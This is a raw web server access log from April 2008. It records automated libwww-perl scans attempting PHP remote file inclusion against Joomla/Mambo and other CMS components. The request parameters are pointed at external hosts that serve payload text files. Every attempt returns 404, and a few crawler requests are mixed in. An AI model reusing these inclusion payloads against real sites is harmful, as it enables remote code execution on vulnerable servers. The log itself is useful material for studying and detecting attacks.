216.73.103.57 - - [01/Apr/2008:07:43:47 -0700] "GET /logs/access_080118.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:43:48 -0700] "GET /logs/access_080118.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:07:43:51 -0700] "GET /logs/access_080118.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [01/Apr/2008:07:44:09 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:07:44:16 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:07:44:16 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:44:31 -0700] "GET /logs/access_080312.log/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:44:32 -0700] "GET /start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:44:32 -0700] "GET /logs/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:44:46 -0700] "GET /logs/access_080312.log/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:44:46 -0700] "GET /start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:44:46 -0700] "GET /logs/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:44:57 -0700] "GET /logs/access_080312.log/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:44:59 -0700] "GET /start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:44:59 -0700] "GET /logs/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:45:11 -0700] "GET /logs/access_080312.log/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:45:11 -0700] "GET /start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:45:15 -0700] "GET /logs/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:45:26 -0700] "GET /logs/access_080312.log/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:45:32 -0700] "GET /start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:45:32 -0700] "GET /logs/start.php?id=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:07:46:16 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:07:46:34 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:07:46:34 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:07:46:52 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:07:46:56 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:07:47:06 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:07:47:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:47:17 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:47:17 -0700] "GET //include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:47:17 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:07:47:26 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:47:26 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.52.59 - - [01/Apr/2008:07:47:33 -0700] "GET /blane/?M=D HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:07:47:52 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:07:47:52 -0700] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:49:30 -0700] "GET /start.php?id=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:50:01 -0700] "GET /logs/access_080128.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:50:02 -0700] "GET /index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:50:02 -0700] "GET /logs/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:51:14 -0700] "GET /logs/access_080118.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:51:36 -0700] "GET /logs/access_080128.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.51.163 - - [01/Apr/2008:07:51:36 -0700] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:51:37 -0700] "GET /index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:51:42 -0700] "GET /logs/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:51:58 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:51:58 -0700] "GET //include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:51:58 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:07:52:12 -0700] "GET /logs/access_071227.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:07:52:13 -0700] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:07:52:13 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:52:44 -0700] "GET /logs/access_080118.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:53:10 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:07:53:15 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:07:53:16 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.234.200.140 - - [01/Apr/2008:07:53:26 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kttcrew.com/1234.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.140 - - [01/Apr/2008:07:53:26 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kttcrew.com/1234.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:07:53:51 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:07:53:52 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [01/Apr/2008:07:54:42 -0700] "GET /index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:07:55:01 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:07:55:14 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.117.79 - - [01/Apr/2008:07:56:09 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.perfecttransportation.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.6.34 - - [01/Apr/2008:07:56:24 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.6.34 - - [01/Apr/2008:07:56:24 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.6.34 - - [01/Apr/2008:07:56:24 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:07:56:35 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.6.34 - - [01/Apr/2008:07:57:04 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:57:20 -0700] "GET /logs/access_080128.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:57:20 -0700] "GET /index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:57:21 -0700] "GET /logs/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.93 - - [01/Apr/2008:07:57:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:58:02 -0700] "GET /logs/access_080312.log/start.php?id=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.250 - - [01/Apr/2008:07:58:03 -0700] "GET /logs/access_071102.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:58:03 -0700] "GET /logs/start.php?id=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.39 - - [01/Apr/2008:07:58:15 -0700] "GET /logs/access_071012.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:07:58:25 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:07:58:25 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:07:58:25 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:07:58:29 -0700] "GET /support/mailling/maillist/inc/initdb.php?absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:07:58:29 -0700] "GET /logs/support/mailling/maillist/inc/initdb.php?absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
206.190.65.132 - - [01/Apr/2008:07:58:34 -0700] "GET /logs/access_080215.log//convert/mvcw.php?step=1&vwar_root=http://www.kilbowiethistle.com/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.65.132 - - [01/Apr/2008:07:58:34 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.kilbowiethistle.com/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.65.132 - - [01/Apr/2008:07:58:34 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.kilbowiethistle.com/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:58:52 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:58:52 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:58:52 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:58:52 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:58:53 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:58:53 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:58:54 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:58:54 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:02 -0700] "GET /logs/access_080308.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:02 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:02 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:02 -0700] "GET /logs/access_080308.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:02 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:03 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:59:09 -0700] "GET /logs/access_080128.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:59:09 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:59:09 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:59:10 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:59:10 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:59:10 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:59:10 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:59:11 -0700] "GET /index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:07:59:13 -0700] "GET /logs/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:07:59:18 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:07:59:18 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:59:27 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:07:59:27 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:28 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:28 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:29 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:29 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:29 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
